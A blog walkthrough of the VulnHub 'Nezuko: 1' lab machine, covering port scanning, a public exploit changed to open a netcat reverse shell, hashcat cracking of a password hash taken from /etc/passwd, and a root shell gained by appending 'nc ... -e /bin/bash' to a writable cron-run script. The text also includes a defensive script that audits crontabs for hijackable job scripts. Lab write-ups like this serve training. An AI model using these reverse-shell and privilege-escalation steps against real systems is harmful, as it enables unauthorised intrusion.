VulnHub Nezuko: 1 Walkthrough

Today we are doing nezuko: 1 from VulnHub. As usual, I also have a video walkthrough that you can find here.

This is a beginner level box and doesn’t take too long to get through.

We start off with our nmap scan: nmap -sV -sC -v 192.168.2.131 -oN map1

There’s a webport so let’s take a look at that.

Ok weird but whatever. Let’s see if there’s a robots.txt file.

There is and it’s a weird string. It kind of looks like base64, but it’s not. I’m not going to go into this here as the challenge is a little bit of a time suck. In the end it gives a rather pointless hint.

After finding the robots.txt file, I also ran a gobuster search: gobuster dir -u 192.168.2.131 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

It produced one directory that was basically a dead end. I decided to run another nmap scan as I worked on the string from the robots.txt file.

nmap -sC -sV -v -p- -oN map2 192.168.2.131

The full port scan turns up another web page, which makes solving the string puzzle utterly useless. This one is using SSL, so we’ll need to add https:// along with the port.

Here we confirm it’s a login page. Let’s check the version from the nmap scan and see if it’s vulnerable.

It looks like there’s a remote code execution vulnerability available. Let’s check it out.

Running searchsploit -m 47293 copies the exploit into the directory you’re in.

This exploit is really just a vuln scan. It doesn’t exploit anything but that doesn’t mean we can’t make it do what we want. There was also a Metasploit module available which works perfectly fine too if you want to go that route.

First, let’s just run this and see if it’s vulnerable.

Ok so this is a problem. After some quick searching it turns out that this can happen when copying scripts from a Windows environment to Linux (Windows line endings leave a stray carriage return at the end of each line). Opening it in a plain text editor and doing another copy paste seems to get rid of the bad character causing the problem.

Once we run it, the script confirms it’s vulnerable. Now let’s modify it to get a shell.

Basically, this script sends a command (echo 'flag') and then searches the response to see if it executed. So if we just replace the echo command with a netcat reverse shell, we should get a connection back (assuming netcat with the -e flag is on the box).

Once the code is in place, we set up a listener, run the code and …

We get a shell as nezuko!

Let’s upgrade our shell.

It turns out that python2 is not installed, but we can still use python3.

Now let’s see what we can get into.

Looking at the /etc/passwd file we see two users … and a password hash!

Let’s crack the hash with hashcat. I copied the hash into a file and sent it to my Windows machine for cracking. Your command will be slightly different if using Linux.

hashcat64.exe -m 1800 nez.hash wordlists/rockyou.txt

After a few seconds, we get a password back … meowmeow

Let’s become the zenitsu user.

Ok now we’re zenitsu. Unfortunately, zenitsu does not have sudo permissions. Let’s see if there’s anything in the user directories.

Looking at nezuko’s directory it looks like zenitsu is asking nezuko out every 5 minutes. That’s a little creepy, obsessive, and stalkerish, but maybe we can use this to our advantage. Let’s look at zenitsu’s directory and see if there’s a script.

Ok we did find a script and we’re able to write to it. Let’s add a netcat line and see if we get a shell back.

We’ll set up another netcat listener on our attack machine first: nc -nlvp 8888

echo 'nc 192.168.2.126 8888 -e /bin/bash' >> send_message_to_nezuko.sh

Next I just cat the file to make sure my code was appended.

Looks good. Now we wait …
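The root shell here comes from a cron job run as one user executing a script another user can write to, which is something a defender can audit for. As an added example (not from the original post), the script below parses a system crontab and reports every job whose script file is owned by a third party or is group/world writable; it assumes GNU coreutils stat on Linux and the system-crontab field layout, and the crontab it is run against is a constructed sample.

```shell
#!/bin/sh
# Added example (not from the original post): audit a system crontab and report
# every job whose script file could be altered by someone other than the user the
# job runs as. This is the defender's side of the privesc used on the box: a job
# run as one user executing a script another user can write to.
# Assumes GNU coreutils stat (Linux) and the system crontab layout
# "min hour dom mon dow user command" (or "@reboot user command").

audit_crontab() (
    crontab_file=$1
    set -f                      # no globbing: crontab fields are full of '*'
    while read -r line; do
        case "$line" in
            ''|'#'*|[A-Za-z_]*=*) continue ;;         # blank, comment, KEY=value
        esac
        set -- $line
        case "$1" in
            @*) [ $# -ge 3 ] || continue; job_user=$2; shift 2 ;;   # @reboot etc.
            *)  [ $# -ge 7 ] || continue; job_user=$6; shift 6 ;;
        esac
        job_uid=$(id -u "$job_user" 2>/dev/null) || job_uid=-1   # -1: unknown user
        for tok in "$@"; do
            case "$tok" in /*) ;; *) continue ;; esac   # absolute paths only
            [ -f "$tok" ] || continue                   # regular files only
            info=$(stat -L -c '%u %a' "$tok")           # "<owner uid> <octal mode>"
            owner_uid=${info%% *}
            mode=${info##* }
            grp_w=$(( (mode / 10) % 10 & 2 ))           # group write bit
            oth_w=$(( mode % 10 & 2 ))                  # other write bit
            # Root-owned files (interpreters, system binaries) are fine for any job;
            # anything else is a finding if a third party owns it or can write to it.
            if { [ "$owner_uid" -ne "$job_uid" ] && [ "$owner_uid" -ne 0 ]; } \
               || [ "$grp_w" -ne 0 ] || [ "$oth_w" -ne 0 ]; then
                echo "WRITABLE job_user=$job_user file=$tok owner_uid=$owner_uid mode=$mode"
            fi
        done
    done < "$crontab_file"
)
```

Run it as audit_crontab /etc/crontab (and against each file under /etc/cron.d) to get one WRITABLE line per job that a lower-privileged user could hijack.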

After a few minutes we get a shell back.

And we’re root!!!

Let’s get the final flag.

That was nezukochan. It’s not too difficult. The obscure hint took more time to track down for me than actually rooting the box. That might have been fine except that the hint doesn’t really help unless you’re really new at this stuff. If that’s the case, then you’d probably struggle decoding the hint as well.

If you’d like to see a video walkthrough where I show the Metasploit module and string decoding you can find it here.

Happy Hacking!

-R3a50n